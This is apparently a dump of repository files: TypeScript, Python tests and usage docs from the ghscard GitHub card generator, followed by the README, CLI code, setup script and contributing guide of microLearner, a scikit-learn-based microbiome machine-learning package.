\"./types\";\n\nexport function createCardGenerator(\n doc: Document,\n 
cardStyle: CardStyle,\n cardData: object,\n iframeWidth: number,\n color: string,\n chartDisplay: ElementDisplay,\n topicDisplay: ElementDisplay,\n emojiProcessor: EmojiProcessorInterface\n): CardGeratorInterface {\n const cardType: CardType = cardData[\"card_type\"].toLowerCase();\n\n console.debug([\n \"createCardGenerator:\",\n ` chartDisplay: ${chartDisplay}`,\n ` topicDisplay: ${topicDisplay}`,\n ]);\n\n switch (cardType) {\n case \"organization\": {\n switch (cardStyle) {\n case \"medium\": {\n return new MediumOrgCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n emojiProcessor\n );\n }\n case \"small\": {\n return new SmallOrgCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n emojiProcessor\n );\n }\n case \"tiny\": {\n return new TinyOrgCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n emojiProcessor\n );\n }\n default: {\n console.error(`invalid card style: type=${cardType}, style=${cardStyle}`);\n return null;\n }\n }\n }\n case \"repository\": {\n switch (cardStyle) {\n case \"medium\": {\n return new MediumRepoCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n chartDisplay,\n topicDisplay,\n emojiProcessor\n );\n }\n case \"small\": {\n return new SmallRepoCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n chartDisplay,\n topicDisplay,\n emojiProcessor\n );\n }\n case \"tiny\": {\n return new TinyRepoCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n chartDisplay,\n topicDisplay,\n emojiProcessor\n );\n }\n default: {\n console.error(`invalid card style: type=${cardType}, style=${cardStyle}`);\n return null;\n }\n }\n }\n case \"user\": {\n switch (cardStyle) {\n case \"medium\": {\n return new MediumUserCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n emojiProcessor\n );\n }\n case \"small\": {\n return new SmallUserCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n emojiProcessor\n );\n }\n case \"tiny\": {\n return new TinyUserCardGerator(\n doc,\n cardData,\n iframeWidth,\n color,\n 
emojiProcessor\n );\n }\n default: {\n console.error(`invalid card style: type=${cardType}, style=${cardStyle}`);\n return null;\n }\n }\n }\n default: {\n console.error(`invalid card type: ${cardType}`);\n return null;\n }\n }\n}\n" }, { "alpha_fraction": 0.46306896209716797, "alphanum_fraction": 0.46852004528045654, "avg_line_length": 32.66054916381836, "blob_id": "b676dc9ef1a49da9499e32b7a9d6414ab276e5b1", "content_id": "8864dcced3fdeb7ed182b00133b177dfeaffdd04", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3669, "license_type": "permissive", "max_line_length": 123, "num_lines": 109, "path": "/docs/pages/usage/usage.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "Usage\n=============\n\nCreate User/Organization Cards\n------------------------------------\n1. Generate a card data file\n Execute ``ghscard gen <user-name or organization-name>``.\n\n .. code::\n\n $ ghscard gen thombashi -o data\n [INFO] ghscard gen: written user data to 'data/thombashi.json'\n\n2. Add HTML tags to a HTML file\n .. code-block:: html\n\n <div class='ghscard' src='data/thombashi.json'></div>\n\n <script src=\"//cdn.jsdelivr.net/gh/thombashi/ghscard@master/dist/ghscard.min.js\"></script>\n\n3. Result\n .. raw:: html\n\n <iframe src=\"//thombashi.github.io/ghscard/examples/user.html\" width=\"440\" height=\"510\" style=\"border: 0px;\">\n </iframe>\n \n\nCreate Repository Cards\n--------------------------------------\n1. Generate a card data file\n Execute ``ghscard gen <user name>/<repository name>``.\n\n .. code::\n\n $ ghscard gen Microsoft/TypeScript -o data\n [INFO] ghscard gen: written repository data to 'data/Microsoft_TypeScript.json'\n\n2. Add HTML tags to a HTML file\n .. code-block:: html\n \n <div class=\"ghscard\" src=\"data/Microsoft_TypeScript.json\"></div>\n\n <script src=\"//cdn.jsdelivr.net/gh/thombashi/ghscard@master/dist/ghscard.min.js\"></script>\n\n3. Result\n .. 
raw:: html\n \n <iframe src=\"//thombashi.github.io/ghscard/examples/repository.html\" width=\"460\" height=\"670\" style=\"border: 0px;\">\n </iframe>\n\n\nCard Configurations\n--------------------------------------\n\n``card-style`` Attribute\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nCard size and display format change according to ``card-style`` attribute.\n``card-style`` attribute takes one of the following values:\n\n- ``medium`` `(default)`\n- ``small``\n- ``tiny``\n\n`Examples <//thombashi.github.io/ghscard/examples/card-style.html>`__\n\n\n``chart-display`` Attribute\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nCharts on repository cards can be changed visible or hidden by ``chart-display`` attribute value.\n\n.. table:: ``chart-display`` attribute\n\n ======================= ================================================\n Value Meaning\n ======================= ================================================\n ``block`` Display charts on cards.\n ``none`` NOT display charts on cards.\n ======================= ================================================\n\nDefault value differed by ``card-style`` attribute:\n\n.. table:: Default value of ``chart-display``\n\n ======================= ================================================\n ``card-style`` value Default value\n ======================= ================================================\n ``medium`` ``block``\n ``small`` ``block``\n ``tiny`` ``none``\n ======================= ================================================\n\n`Examples <//thombashi.github.io/ghscard/examples/chart-display.html>`__\n\n\n``topic-display`` Attribute\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nTopic labels repository cards can be changed visible or hidden by ``topic-display`` attribute value.\nDefaults to ``block``.\n\n.. 
table:: ``topic-display`` attribute\n\n ======================= ================================================\n Value Meaning\n ======================= ================================================\n ``block`` Display topic labels on cards.\n ``none`` NOT display topic labels on cards.\n ======================= ================================================\n\n`Examples <//thombashi.github.io/ghscard/examples/topic-display.html>`__\n" }, { "alpha_fraction": 0.6360874772071838, "alphanum_fraction": 0.6360874772071838, "avg_line_length": 30.961164474487305, "blob_id": "be14a1f0a8bb2a49cabdf4435c5ce1f1f0a1c58b", "content_id": "767f13117b6c86a000595ce72400ea90f29e15f0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3292, "license_type": "permissive", "max_line_length": 97, "num_lines": 103, "path": "/test/test_detector.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport github\nimport logbook\nimport pytest\nfrom github.GithubException import UnknownObjectException\n\nfrom ghscard._const import CardType\nfrom ghscard._detector import GithubIdDetector\n\n\ndef monkey_get_organization(a, b):\n raise UnknownObjectException(\"dummy_status\", \"dummy_data\", None)\n\n\nlogger = logbook.Logger(\"test\")\n\n\nclass Test_GithubIdDetector_constructor:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"],\n [\n [None, ValueError],\n [\"\", ValueError],\n [\"/\", ValueError],\n [\"//\", ValueError],\n [\"a/b/c\", ValueError],\n ],\n )\n def test_exception(self, value, expected):\n with pytest.raises(expected):\n GithubIdDetector(value, logger, pygh_client=github.Github(None))\n\n\nclass Test_GithubIdDetector_id:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"],\n [\n [\"thombashi\", \"thombashi\"],\n [\"thombashi/\", \"thombashi\"],\n [\"/thombashi\", \"thombashi\"],\n [\"/thombashi/\", 
\"thombashi\"],\n [\"thombashi/ghscard\", \"thombashi/ghscard\"],\n [\" thombashi / ghscard \", \"thombashi/ghscard\"],\n ],\n )\n def test_normal(self, monkeypatch, value, expected):\n monkeypatch.setattr(github.Github, \"get_organization\", monkey_get_organization)\n\n detector = GithubIdDetector(value, logger, pygh_client=github.Github(None))\n\n assert detector.id == expected\n\n\nclass Test_GithubIdDetector_is_user:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"],\n [[\"thombashi\", True], [\"thombashi/\", True], [\"/thombashi\", True], [\"/thombashi/\", True]],\n )\n def test_normal(self, monkeypatch, value, expected):\n monkeypatch.setattr(github.Github, \"get_organization\", monkey_get_organization)\n\n detector = GithubIdDetector(value, logger, pygh_client=github.Github(None))\n\n assert detector.is_user() == expected\n\n\nclass Test_GithubIdDetector_is_organization:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"],\n [[\"thombashi\", True], [\"thombashi/\", True], [\"/thombashi\", True], [\"/thombashi/\", True]],\n )\n def test_normal(self, monkeypatch, value, expected):\n monkeypatch.setattr(github.Github, \"get_organization\", lambda a, b: a)\n\n detector = GithubIdDetector(value, logger, pygh_client=github.Github(None))\n\n assert detector.is_organization() == expected\n\n\nclass Test_GithubIdDetector_is_repository:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"], [[\"thombashi/ghscard\", True], [\" thombashi / ghscard \", True]]\n )\n def test_normal(self, value, expected):\n detector = GithubIdDetector(value, logger, pygh_client=github.Github(None))\n\n assert detector.is_repository() == expected\n\n\nclass Test_GithubIdDetector_get_id_type:\n @pytest.mark.parametrize(\n [\"value\", \"expected\"],\n [[\"thombashi\", CardType.USER], [\"thombashi/ghscard\", CardType.REPOSITORY]],\n )\n def test_normal(self, monkeypatch, value, expected):\n monkeypatch.setattr(github.Github, \"get_organization\", monkey_get_organization)\n\n 
detector = GithubIdDetector(value, logger, pygh_client=github.Github(None))\n\n assert detector.get_id_type() == expected\n" }, { "alpha_fraction": 0.5960837602615356, "alphanum_fraction": 0.5969945192337036, "avg_line_length": 35, "blob_id": "6bf8575a4813d3b4431e2358f3e07af8e1691d58", "content_id": "15dc2540011f2611ec2bbfc9d3c73b3b28a1ece1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 2196, "license_type": "permissive", "max_line_length": 96, "num_lines": 61, "path": "/src/card/organization/base_organization.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { AbstractUserOrgCardGerator } from \"../base_user_org\";\n\nexport class AbstractOrgCardGerator extends AbstractUserOrgCardGerator {\n protected get statsColumnWide(): string {\n return \"eight\";\n }\n\n protected createCardHeader(): HTMLElement {\n const header = this.createAnchorElement(\n this.htmlUrl,\n `ui ${this.headerSize} dividing header`\n );\n\n if (this.getCardData(\"name\")) {\n header.appendChild(this._doc.createTextNode(this.getCardData(\"name\")));\n\n const subheader: HTMLElement = this.createElement(\"div\", \"sub header\");\n subheader.appendChild(this._doc.createTextNode(this.getCardData(\"id\")));\n\n header.appendChild(subheader);\n } else {\n header.appendChild(this._doc.createTextNode(this.getCardData(\"id\")));\n }\n\n return header;\n }\n\n protected createStatisticsElement(): HTMLElement {\n const items = this.createElement(\"div\", `ui ${this.infoSize} aligned selection list`);\n\n if (Number(this.publicRepos) > 0) {\n const item = this.createAnchorElement(`${this.htmlUrl}?tab=repositories`, \"item\");\n /*\n item.appendChild(this.createElement(\"i\", \"book icon\"));\n item.appendChild(this.createContentElement([\n this._doc.createTextNode(\"Repositories\"),\n this.createLabelElement(this.publicRepos, this.infoSize),\n ]));\n */\n 
item.appendChild(this._doc.createTextNode(\"Repositories\"));\n item.appendChild(this.createLabelElement(this.publicRepos, this.infoSize));\n\n items.appendChild(item);\n }\n\n if (Number(this.getCardData(\"public_members_count\")) > 0) {\n const item = this.createAnchorElement(\n `//github.com/orgs/${this.getCardData(\"id\")}/people`,\n \"item\"\n );\n item.appendChild(this._doc.createTextNode(\"People\"));\n item.appendChild(\n this.createLabelElement(this.getCardData(\"public_members_count\"), this.infoSize)\n );\n\n items.appendChild(item);\n }\n\n return items;\n }\n}\n" } ]
55
mortonjt/microLearner
https://github.com/mortonjt/microLearner
3949a4310ae2012b47a3bd5f8b906c36a3c43b8d
6ee58a0ddb4b99394290b9f768163d5330f52ad3
62f0f71fca1310c77e1fc330298ff1f7954d35cf
refs/heads/master
2020-12-25T21:44:41.616159
2014-07-14T20:17:25
2014-07-14T20:38:50
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6993613243103027, "alphanum_fraction": 0.7066605687141418, "avg_line_length": 27.467533111572266, "blob_id": "d834d9d74c37a2524c1f2adab8a28b0ade1252e9", "content_id": "045d3d5316225991019546698cf8fcde57c65c48", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2192, "license_type": "permissive", "max_line_length": 164, "num_lines": 77, "path": "/README.md", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "Machine Learning Package for Microbiome\n=======================================\n[![Build Status](https://travis-ci.org/RNAer/microLearner.svg?branch=master)](https://travis-ci.org/RNAer/microLearner)\n\n\nDependencies\n------------\n1. scikit-learn\n2. click\n3. pandas\n\nRunning the Commands\n-------------------\n\n### Bash completion\nEmpowered by `click`, `microLearner` supports bash auto-completion for command,\nsubcommands, arguments and options. Users just need to run:\n```\nsource bash_completion.sh\n```\nOr to make it permenant, add the above line to your `~/.bashrc` file.\n\nThe `bash_completion.sh` file comes with the package. But you can also create or\nupdate it with the following command:\n```\n_MICROLEARNER_COMPLETE=source microLearner > bash_completion.sh\n```\n\n### Other tips\n1. `microLearner` supports shorthands for subcommands as long as the shorthand is\n unambiguous. For example, `microLearner prep --help` and `microLearner preprocess --help`\n are exactly the same.\n \n2. `microLearner` is insensitive to the letter cases. For example, `microLearner prep --help`\n and `MicroLearner Prep --HELP`\n are exactly the same.\n\n\nPreprocess\n----------\n``preprocess`` is the subcommand of ``microLearner``. ``MinMaxScaler`` is the argument\nto the subcommand. ``--range``, ``-o`` and ``-i`` are the options. 
The options for the command is insensitive to the letter cases.\n\n```\nmicroLearner preprocess MinMaxScaler --range 0 1 -i microLearner/data/otus.txt -o /tmp/foo.txt\n```\n\n```\nmicroLearner preprocess MinMaxScaler --Range 0 1 -i microLearner/data/otus.txt -o /tmp/foo.txt\n```\n\nClassification\n--------------\n```\nmicroLearner classify DecisionTreeClassifier --criterion entropy --max_features None --max_depth None --min_samples_split 2 --min_samples_leaf 1 --random_state None\n```\n```\nmicroLearner classify DecisionTreeClassifier --criterion entropy --max_features None --max_depth None --min_samples_split 2 --min_samples_leaf 1 --random_state None\n```\n\n```\nmicroLearner classify RandomForestClassifier --n_estimators 500\n```\n```\nmicroLearner classify RandomForestClassifier \n```\nRegression\n----------\n```\nmicroLearner regress\n```\n\nClustering\n----------\n```\nmicroLearner cluster\n```\n" }, { "alpha_fraction": 0.5841053128242493, "alphanum_fraction": 0.5875182747840881, "avg_line_length": 33.18333435058594, "blob_id": "2e8864f19e9a4ad01bce1752f6874445ee6b5a31", "content_id": "b80f878a4cb85ff144aee635dedcbd3dba7208e9", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2051, "license_type": "permissive", "max_line_length": 78, "num_lines": 60, "path": "/microLearner/cmd.py", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# ----------------------------------------------------------------------------\n# Copyright (c) 2014--, microLearner development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\n\n\nfrom __future__ import print_function\nfrom microLearner.util.misc import AliasedGroup\nfrom sklearn import preprocessing\nimport click\nimport pandas as 
pd\nimport numpy as np\n\n\nCONTEXT_SETTINGS = dict(token_normalize_func=lambda x: x.lower())\n\n\[email protected](cls=AliasedGroup, context_settings=CONTEXT_SETTINGS)\[email protected]('-v', '--verbose', count=True)\[email protected]_option() # add --version option\[email protected]_context\ndef microLearner(ctx, verbose):\n pass\n\n\[email protected]()\[email protected]('method', nargs=1, default='StandardScaler',\n required=True,\n # specify legal choices for the methods; anything not\n # listed here will be not allowed.\n type=click.Choice(['StandardScaler',\n 'MinMaxScaler']))\[email protected]('-i', '--input_table', type=click.File('r'),\n # required=True,\n help='Input feature table.')\[email protected]('-o', '--output_table', type=click.File('w'),\n # required=True,\n help='Output feature table.')\[email protected]('--feature_range', nargs=2, type=float)\[email protected]_context\ndef preprocess(ctx, method, input_table, output_table, **kwargs):\n if ctx.parent.params['verbose'] > 0:\n click.echo(\"Running...\")\n click.echo(kwargs)\n if True:\n scaler = getattr(preprocessing, method)(**kwargs)\n i = pd.read_table(input_table)\n print(i)\n o = pd.DataFrame(scaler.fit_transform(np.array(i)), columns=i.columns)\n print(o)\n o.to_csv(output_table, sep='\\t')\n # output_table.write(out)\n else:\n print(ctx.parent.params)\n pass\n" }, { "alpha_fraction": 0.5846154093742371, "alphanum_fraction": 0.5923076868057251, "avg_line_length": 31.5, "blob_id": "a93092ba001446c1f00cdbb007b9d75bdc268c3b", "content_id": "d11751e43570a69be88de0d8d7999ded285296bb", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 260, "license_type": "permissive", "max_line_length": 61, "num_lines": 8, "path": "/bash_completion.sh", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "_microLearner_completion() {\n COMPREPLY=( $( COMP_WORDS=\"${COMP_WORDS[*]}\" \\\n COMP_CWORD=$COMP_CWORD \\\n 
_MICROLEARNER_COMPLETE=complete $1 ) )\n return 0\n}\n\ncomplete -F _microLearner_completion -o default microLearner;\n" }, { "alpha_fraction": 0.5050167441368103, "alphanum_fraction": 0.5117056965827942, "avg_line_length": 30.473684310913086, "blob_id": "5972320d41037f15b903d9b8ffbe2f3baf87f088", "content_id": "8e37ec70aeac517dd60d6369f581a6ffa19be7b7", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 598, "license_type": "permissive", "max_line_length": 78, "num_lines": 19, "path": "/microLearner/instances.py", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# ----------------------------------------------------------------------------\n# Copyright (c) 2014--, microLearner development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\nfrom __future__ import print_function\nfrom pandas import DataFrame\n\n\nclass Instances(DataFrame):\n '''\n '''\n def __init__(self, features, outcome):\n self.features = features\n self.outcome = outcome\n" }, { "alpha_fraction": 0.6110865473747253, "alphanum_fraction": 0.6208038926124573, "avg_line_length": 35.51612854003906, "blob_id": "ef6755fc1405d63c4425c7d2ca047af70425cc44", "content_id": "10473d80ada3054137e67c7bef6a3edd20c23161", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4528, "license_type": "permissive", "max_line_length": 98, "num_lines": 124, "path": "/setup.py", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# ----------------------------------------------------------------------------\n# Copyright (c) 2014--, microLearner development team.\n#\n# Distributed under the terms of the Modified 
BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\n\n# The PACKAGE is the top-level folder containing the __init__.py module\n# that should be in the same directory as your setup.py file\nPACKAGE = \"microLearner\"\n# The NAME is what people will refer to your software as,\n# the name under which your software is listed in PyPI and\n# under which users will install it (for example, pip install NAME)\nNAME = \"microLearner\"\nDESCRIPTION = \"Python package for ncRNA annotation\"\nAUTHOR = \"microLearner development team\"\nAUTHOR_EMAIL = \"[email protected]\"\nURL = \"https://github.com/RNAer/microLearner\"\nVERSION = __import__(PACKAGE).__version__\n\n# Always prefer setuptools over distutils\nfrom setuptools import setup, find_packages\n\n# Get the long description from the relevant file\nwith open('README.md') as f:\n long_description = f.read()\n\nsetup(\n name=NAME,\n\n # Versions should comply with PEP440. For a discussion on single-sourcing\n # the version across setup.py and the project code, see\n # http://packaging.python.org/en/latest/tutorial.html#version\n version=VERSION,\n\n # What does your project relate to?\n keywords=['Microbiome', 'Machine Learning', 'Bioinformatics'],\n\n description=DESCRIPTION,\n\n long_description=long_description,\n\n # The project's main homepage.\n url=URL,\n\n # Author details\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n\n # Choose your license\n license='BSD',\n\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n # How mature is this project? 
Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 2 - Pre-Alpha',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Developers',\n 'Intended Audience :: Bioinformatician',\n\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Scientific/Engineering :: Bio-Informatics',\n\n # Pick your license as you wish (should match \"license\" above)\n 'License :: OSI Approved :: BSD License',\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n ],\n\n # You can just specify the packages manually here if your project is\n # simple. Or you can use find_packages().\n packages=find_packages(exclude=['contrib', 'docs', 'tests*']),\n\n # List run-time dependencies here. These will be installed by pip when\n # your project is installed. For an analysis of \"install_requires\" vs pip's\n # requirements files see:\n # https://packaging.python.org/en/latest/technical.html#install-requires-vs-requirements-files\n install_requires=['numpy >= 1.7',\n 'scipy >= 0.13.0',\n 'matplotlib >= 1.1.0',\n 'scikit-learn',\n 'click',\n # 'biom',\n 'pandas',\n 'future'],\n extras_require={'test': [\"nose >= 0.10.1\", \"pep8\", \"flake8\"],\n 'doc': [\"Sphinx >= 1.2.2\", \"sphinx-bootstrap-theme\"]},\n\n # Include additional files into the package\n include_package_data=True,\n\n # If there are data files included in your packages that need to be\n # installed, specify them here. 
If using Python 2.6 or less, then these\n # have to be included in MANIFEST.in as well.\n package_data={\n 'microLearner': ['data/*'],\n },\n\n # To provide executable scripts, use entry points in preference to the\n # \"scripts\" keyword. Entry points provide cross-platform support and allow\n # pip to create the appropriate form of executable for the target platform.\n entry_points={\n 'console_scripts': [\n 'microLearner=microLearner.cmd:microLearner',\n ],\n },\n\n test_suite='nose.collector'\n)\n" }, { "alpha_fraction": 0.649789035320282, "alphanum_fraction": 0.6540084481239319, "avg_line_length": 17.230770111083984, "blob_id": "c2a54650dcd587f9b6be51b90be7565dd118952a", "content_id": "6c3242757bb6525964f7daddf0d0810c273a00be", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "permissive", "max_line_length": 44, "num_lines": 13, "path": "/microLearner/tests/test_instances.py", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom microLearner.instances import Instances\nfrom unittest import TestCase, main\n\n\nclass InstancesTests(TestCase):\n def setUp(self):\n self.a1 = Instances('a', 'b')\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5332188010215759, "alphanum_fraction": 0.5366551876068115, "avg_line_length": 32.57692337036133, "blob_id": "cd1c04a32bc0450ce33048af7a53fd85dff1e4f4", "content_id": "fc94e99d812bb639be429c65333b9b2861edda88", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1746, "license_type": "permissive", "max_line_length": 78, "num_lines": 52, "path": "/microLearner/util/misc.py", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# ----------------------------------------------------------------------------\n# Copyright (c) 2014--, microLearner development 
team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\n\nimport click\n\n\nclass AliasedGroup(click.Group):\n ''' Alias for commands.\n\n This implements a subclass of click.Group that accepts a prefix\n for a command. If there were a (sub)command called \"push\", it would\n accept \"pus\" as an alias (so long as it was unique).\n '''\n def get_command(self, ctx, cmd_name):\n rv = click.Group.get_command(self, ctx, cmd_name)\n if rv is not None:\n return rv\n matches = [x for x in self.list_commands(ctx)\n if x.startswith(cmd_name)]\n if not matches:\n return None\n elif len(matches) == 1:\n return click.Group.get_command(self, ctx, matches[0])\n ctx.fail('Too many matches: %s' % ', '.join(sorted(matches)))\n\n\nclass MultiParamType(click.ParamType):\n def __init__(self, name=None, func=None):\n if name is not None:\n self.name = ' '.join('Multiple', func.__name__)\n else:\n self.name = name\n self.func = func\n\n def convert(self, value, param, ctx):\n try:\n values = [i for i in value.split(',') if i]\n if self.func is None:\n return values\n else:\n return [self.func(i) for i in values]\n except ValueError:\n self.fail('%s is not a valid' % value, param, ctx)\n\nmulti_int = MultiParamType(func=int)\n" }, { "alpha_fraction": 0.5054945349693298, "alphanum_fraction": 0.5183150172233582, "avg_line_length": 33.125, "blob_id": "492311ad5a89dbb8c0a71e0820508792d31e8ba2", "content_id": "e62797405e481ff3b7a92790627d674bbb8bf3fc", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 546, "license_type": "permissive", "max_line_length": 78, "num_lines": 16, "path": "/microLearner/__init__.py", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nfrom __future__ import print_function\n\n# 
----------------------------------------------------------------------------\n# Copyright (c) 2014--, microLearner development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\n\n__credits__ = \"microLearner development team\"\n__version__ = \"1.0.0-dev\"\n\nfrom numpy.testing import Tester\ntest = Tester().test,\n" }, { "alpha_fraction": 0.7686547636985779, "alphanum_fraction": 0.7716671228408813, "avg_line_length": 83.1956558227539, "blob_id": "364270b8b89593ab27a480ec57fe3ed220e02be4", "content_id": "318f0d786e49bc15afba0a6287dfca39039beb17", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11623, "license_type": "permissive", "max_line_length": 851, "num_lines": 138, "path": "/CONTRIBUTING.md", "repo_name": "mortonjt/microLearner", "src_encoding": "UTF-8", "text": "Contributing to microLearner\n======================\n\nmicroLearner is an open source software package, and we welcome community contributions. You can find the source code and test code for microLearner under public revision control in the microLearner git repository.\n\nThis document will help you get started with contributing to microLearner. You should read this whole document before considering submitting code to microLearner. 
This will save time for both you and the microLearner developers.\n\nType of Submissions\n-------------------\n\nSome of the types of contributions we're interested in are new features (big or small, but for big ones it's generally a good idea to ask us if we're interested in including it before starting development), bug fixes, and documentation updates, additions, and fixes.\n\nWhen considering submitting a new feature to microLearner, you should begin by posting an issue to the [microLearner issue tracker](https://github.com/RNAer/microLearner/issues). The information that you include in that post will differ based on the type of contribution. Your contribution will also need to be fully tested (discussed further below).\n\n* For new features, you'll want to describe why the functionality that you are proposing to add is relevant. For it to be relevant, it should be demonstrably useful to microLearner users. This typically means that a new analytic method is implemented (you should describe why it's useful, ideally including a link to a paper that uses this method), or an existing method is enhanced (your implementation matches the performance of the pre-existing method while reducing runtime, memory consumption, etc, or it improves performance over the pre-existing method). We will request benchmark results comparing your method to the pre-existing methods (which would also be required for publication of your method) so pointing to a paper or other document containing benchmark results, or including benchmark results in your issue, will speed up the process.\n\n* For bug fixes, you should provide a detailed description of the bug so other developers can reproduce it. We take bugs in microLearner very seriously. Bugs can be related to errors in code, documentation, or tests. Errors in documentation or tests are usually updated in the next major release of microLearner. 
Errors in code that could result in incorrect results or inability to access certain functionality may result in a new minor release of microLearner.\n\n You should include the following information in your bug report:\n\n 1. The exact command or function call that you issue to create the bug.\n 2. A link to all necessary input files for reproducing the bug. These files should only be as large as necessary to create the bug. For example, if you have an input file with 10,000 data points but the error only arises due to one of them, create a new input file with a few data points including that one, run the command that was giving you problems, and verify that you still get an error. Then post that command and link to the trimmed input file. This is *extremely* useful to other developer, and it is likely that if you don't provide this information you'll get a response asking for it. Often this process helps you to better understand the bug as well.\n\n* For documentation additions, you should first post an issue describing what you propose to add, where you'd like to add it in the documentation, and a description of why you think it's an important addition. For documentation improvements and fixes, you should post an issue describing what is currently wrong or missing, and how you propose to address it. For more information about building and contributing to microLearner's documentation, see [this guide](doc/README.md).\n\nWhen you post your issue, the microLearner developers will respond to let you know if we agree with the addition or change. It's very important that you go through this step to avoid wasting time working on a feature that we are not interested in including in microLearner.\n\n\nGetting started: \"help wanted\"\n------------------------------\n\nSome of our issues are labeled as ``help wanted``. 
Working on [these issues](https://github.com/RNAer/microLearner/issues?direction=desc&labels=quick+fix%2Chelp+wanted&page=1&sort=updated&state=open) is a good way to get started with contributing to microLearner. These are usually small bugs or documentation errors that will only require one or a few lines of code to fix. Getting started by working on one of these issues will allow you to familiarize yourself with our development process before committing to a large amount of work (e.g., adding a new feature to microLearner). If you're interested in working on one of these issues, you should comment on the issue requesting that it be assigned to you.\n\n\nCode Review\n-----------\n\nWhen you submit code to microLearner, it will be reviewed by one or more microLearner developers. These reviews are intended to confirm a few points:\n\n* Your code is sufficiently well-tested (see Testing Guidelines below).\n* Your code adheres to our Coding Guidelines (see Coding Guidelines below).\n* Your code is sufficiently well-documented (see Coding Guidelines below).\n* Your code provides relevant changes or additions to microLearner (Type of Submissions above).\n\nThis process is designed to ensure the quality of microLearner, and can be a very useful experience for new developers.\n\nParticularly for big changes, if you'd like feedback on your code in the form of a code review as you work, you should request help in the issue that you created and the microLearner developers will work with you to perform regular code reviews. This can greatly reduce development time (and frustration) so we highly recommend that new developers take advantage of this rather than submitting a pull request with a massive amount of code in one chunk. 
